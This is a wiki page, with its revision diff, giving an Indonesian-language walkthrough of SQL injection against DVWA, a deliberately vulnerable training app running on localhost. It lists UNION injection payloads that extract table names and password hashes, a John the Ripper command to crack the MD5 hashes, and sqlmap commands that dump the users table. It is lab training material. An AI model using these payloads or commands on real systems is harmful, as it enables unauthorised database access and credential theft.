DVWA: SQLi blind: Difference between revisions

Latest revision as of 00:51, 4 March 2017

DVWA-BLIND SQL INJECTION : LOW Level

Buka DVWA, misalnya http://localhost/DVWA-1.9

Username :  Admin
Password : Password

Pilih SQL Injection BLIND dan dalam kolom ID masukan

1' and 1=1#
1' and 1=1 order by 2 #
ID: 'or' 1=1--

Kita akan lihat ada 5 user

Melihat informasi table

1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #

Melihat informasi table name dari table user

1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #

Terakhir lihat username dan password

1' and 1=0 union select null,concat(first_name,0x0a,password) from users #

Crack md5 password

copy hasil password hash yang diperoleh, save misalnya dengan nama hash

Lakukan

 root@bt:/pentest/passwords/john#./john --format=raw-md5 hash

Exploit DVWA menggunakan SQLmap

Login ke DVWA
Pilih DVWA Security Low
Pada user ID tulis '1
Jalankan addon tamer di browser
Lakukan di terminal,

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

di peroleh dari addon tamer di browser.

lihat tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables

lihat kolom di user tabel

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

lihat field password & dump

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump

Referensi

http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html

@@ Line 1: / Line 1: @@
- DVWA-BLIND SQL INJECTION : LOW Level
+DVWA-BLIND SQL INJECTION : LOW Level
-. Open Local host  http://localhost/dvwa
-Username :  Admin
-Password : Password
-.
+* Buka DVWA, misalnya http://localhost/DVWA-1.9
-.Select SQL Injection BLIND and  column ID issued 1' and 1=1#
+  Username :  Admin
+ Password : Password
-. 1' and 1=1 order by 2 #
+* Pilih SQL Injection BLIND dan dalam kolom ID masukan
-.ID: 'or' 1=1--
+' and 1=1#
-we can see there are 5 user
+' and 1=1 order by 2 #
+ ID: 'or' 1=1--
-. now see information table
+Kita akan lihat ada 5 user
-' and 1=0 union select null,table_name from information_schema.tables#
-..1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
+* Melihat informasi table
-. Information table name from table user
+' and 1=0 union select null,table_name from information_schema.tables#
-' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' #
+' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
-. on the last lets see  user name and password
-' and 1=0 union select null,concat(first_name,0x0a,password) from users #
-. we will crack the md5 password
+* Melihat informasi table name dari table user
-copy the passowrd into kwrite and save with name hash
-next
+' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' #
-root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
+* Terakhir lihat username dan password
+' and 1=0 union select null,concat(first_name,0x0a,password) from users #
-OK GOOD LUCK
+* Crack md5 password
-Ok next lesson .. I will explain How to Exploit DVWA using Sqlmap.
+ copy hasil password hash yang diperoleh, save misalnya dengan nama hash
-. afer login in DVWA and choose DVWA Securty Low
+Lakukan
-. follow this picture
-In User ID write '1
-than show
+  root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
-we have an error and my conclusion that this is sql injection, not blind.
-. copy url and open your console
+==Exploit DVWA menggunakan SQLmap==
-root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
+* Login ke DVWA
+* Pilih DVWA Security Low
+* Pada user ID tulis '1
+* Jalankan addon tamer di browser
+* Lakukan di terminal,
+ root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
+ --> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
+di peroleh dari addon tamer di browser.
---> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
+* lihat tables
-we get this information by tamer data ini browser's tools
-. Now Looking for Database tables
+ root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
-root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
+* lihat kolom di user tabel
-. netx search User's Table
-root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
-. Look at field password.. we will dump it
-root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
-OK GOOD LUCK
+ root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
+* lihat field password & dump
+ root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
 ==Referensi==
 * http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html

DVWA: SQLi blind: Difference between revisions

Latest revision as of 00:51, 4 March 2017

Exploit DVWA menggunakan SQLmap

Referensi

Navigation menu

Page actions

Page actions

Personal tools

Navigation

Search

Tools